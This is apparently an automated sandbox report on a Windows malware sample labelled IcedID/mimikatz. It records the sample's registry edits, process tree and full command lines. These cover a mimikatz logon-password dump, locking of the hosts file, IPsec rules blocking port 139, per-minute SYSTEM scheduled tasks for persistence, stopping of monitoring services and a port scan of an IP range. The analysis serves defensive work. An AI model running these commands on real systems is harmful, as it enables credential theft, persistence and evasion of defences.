\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sabzgqz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sabzgqz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2432 cmd.exe 2932 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00070000000234cd-6.dat nsis_installer_2 behavioral2/files/0x000d000000023421-15.dat nsis_installer_1 behavioral2/files/0x000d000000023421-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" sabzgqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" sabzgqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" sabzgqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ sabzgqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing sabzgqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" sabzgqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tbhauuzkz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tbhauuzkz.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" sabzgqz.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2932 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4848 schtasks.exe 2968 schtasks.exe 4260 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1224 sabzgqz.exe Token: SeDebugPrivilege 1716 sabzgqz.exe Token: SeDebugPrivilege 940 vfshost.exe Token: SeDebugPrivilege 3352 tbhauuzkz.exe Token: SeLockMemoryPrivilege 1764 pcgcfj.exe Token: SeLockMemoryPrivilege 1764 pcgcfj.exe Token: SeDebugPrivilege 2256 tbhauuzkz.exe Token: SeDebugPrivilege 3012 tbhauuzkz.exe Token: SeDebugPrivilege 3156 tbhauuzkz.exe Token: SeDebugPrivilege 2220 tbhauuzkz.exe Token: SeDebugPrivilege 692 tbhauuzkz.exe Token: SeDebugPrivilege 2228 tbhauuzkz.exe Token: SeDebugPrivilege 2328 tbhauuzkz.exe Token: SeDebugPrivilege 3428 tbhauuzkz.exe Token: SeDebugPrivilege 1732 tbhauuzkz.exe Token: SeDebugPrivilege 1576 tbhauuzkz.exe Token: SeDebugPrivilege 2240 tbhauuzkz.exe Token: SeDebugPrivilege 880 tbhauuzkz.exe Token: SeDebugPrivilege 1272 tbhauuzkz.exe Token: SeDebugPrivilege 1944 tbhauuzkz.exe Token: SeDebugPrivilege 3832 tbhauuzkz.exe Token: SeDebugPrivilege 3976 tbhauuzkz.exe Token: SeDebugPrivilege 4960 tbhauuzkz.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe 1224 sabzgqz.exe 1224 sabzgqz.exe 1716 sabzgqz.exe 1716 sabzgqz.exe 2576 xohudmc.exe 540 yqiwqa.exe 2860 sabzgqz.exe 2860 sabzgqz.exe 732 sabzgqz.exe 732 sabzgqz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4480 wrote to memory of 2432 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe 84 PID 4480 wrote to memory of 2432 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe 84 PID 4480 wrote to memory of 2432 4480 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe 84 PID 2432 wrote to memory of 2932 2432 cmd.exe 86 PID 2432 wrote to memory of 2932 2432 cmd.exe 86 PID 2432 wrote to memory of 2932 2432 cmd.exe 86 PID 2432 wrote to memory of 1224 2432 cmd.exe 94 PID 2432 wrote to memory of 1224 2432 cmd.exe 94 PID 2432 wrote to memory of 1224 2432 cmd.exe 94 PID 1716 wrote to memory of 3272 1716 sabzgqz.exe 96 PID 1716 wrote to memory of 3272 1716 sabzgqz.exe 96 PID 1716 wrote to memory of 3272 1716 sabzgqz.exe 96 PID 3272 wrote to memory of 1900 3272 cmd.exe 98 PID 3272 wrote to memory of 1900 3272 cmd.exe 98 PID 3272 wrote to memory of 1900 3272 cmd.exe 98 PID 3272 wrote to memory of 2316 3272 cmd.exe 99 PID 3272 wrote to memory of 2316 3272 cmd.exe 99 PID 3272 wrote to memory of 2316 3272 cmd.exe 99 PID 3272 wrote to memory of 4996 3272 cmd.exe 100 PID 3272 wrote to memory of 4996 3272 cmd.exe 100 PID 3272 wrote to memory of 4996 3272 cmd.exe 100 PID 3272 wrote to memory of 3376 3272 cmd.exe 101 PID 3272 wrote to memory of 3376 3272 cmd.exe 101 PID 3272 wrote to memory of 3376 3272 cmd.exe 101 PID 3272 wrote to memory of 2624 3272 cmd.exe 102 PID 3272 wrote to memory of 2624 3272 cmd.exe 102 PID 3272 wrote to memory of 2624 3272 cmd.exe 102 PID 3272 wrote to memory of 1100 3272 cmd.exe 103 PID 3272 wrote to memory of 1100 3272 cmd.exe 103 PID 3272 wrote to memory of 1100 3272 cmd.exe 103 PID 1716 wrote to memory of 3940 1716 sabzgqz.exe 107 PID 1716 wrote to memory of 3940 1716 sabzgqz.exe 107 PID 1716 wrote to memory of 3940 1716 sabzgqz.exe 107 PID 1716 wrote to memory of 1544 1716 sabzgqz.exe 109 PID 1716 wrote to memory of 1544 1716 sabzgqz.exe 109 PID 1716 wrote to memory of 1544 1716 sabzgqz.exe 109 PID 1716 wrote to memory of 3012 1716 sabzgqz.exe 111 PID 1716 wrote to memory of 3012 1716 sabzgqz.exe 111 PID 1716 wrote to memory of 3012 1716 sabzgqz.exe 111 PID 1716 wrote to memory of 516 1716 sabzgqz.exe 116 PID 1716 wrote to memory of 516 1716 sabzgqz.exe 116 PID 1716 wrote to memory of 516 1716 sabzgqz.exe 116 PID 516 wrote to memory of 4720 516 cmd.exe 118 PID 516 wrote to memory of 4720 516 cmd.exe 118 PID 516 wrote to memory of 4720 516 cmd.exe 118 PID 4720 wrote to memory of 1124 4720 wpcap.exe 119 PID 4720 wrote to memory of 1124 4720 wpcap.exe 119 PID 4720 wrote to memory of 1124 4720 wpcap.exe 119 PID 1124 wrote to memory of 3408 1124 net.exe 121 PID 1124 wrote to memory of 3408 1124 net.exe 121 PID 1124 wrote to memory of 3408 1124 net.exe 121 PID 4720 wrote to memory of 1804 4720 wpcap.exe 122 PID 4720 wrote to memory of 1804 4720 wpcap.exe 122 PID 4720 wrote to memory of 1804 4720 wpcap.exe 122 PID 1804 wrote to memory of 4572 1804 net.exe 124 PID 1804 wrote to memory of 4572 1804 net.exe 124 PID 1804 wrote to memory of 4572 1804 net.exe 124 PID 4720 wrote to memory of 3208 4720 wpcap.exe 125 PID 4720 wrote to memory of 3208 4720 wpcap.exe 125 PID 4720 wrote to memory of 3208 4720 wpcap.exe 125 PID 3208 wrote to memory of 3420 3208 net.exe 127 PID 3208 wrote to memory of 3420 3208 net.exe 127 PID 3208 wrote to memory of 3420 3208 net.exe 127 PID 4720 wrote to memory of 4300 4720 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1656
-
C:\Windows\TEMP\ekleagute\pcgcfj.exe"C:\Windows\TEMP\ekleagute\pcgcfj.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2932
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1224
-
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1900
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1100
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1544
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3012
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\tsmmkppcn\mbklagvue\wpcap.exeC:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3408
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4572
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3420
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1832
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3272
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3680
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1764 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4176 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4348
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt2⤵PID:4380
-
C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exeC:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:756 -
C:\Windows\tsmmkppcn\Corporate\vfshost.exeC:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2968
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4628
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4876
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
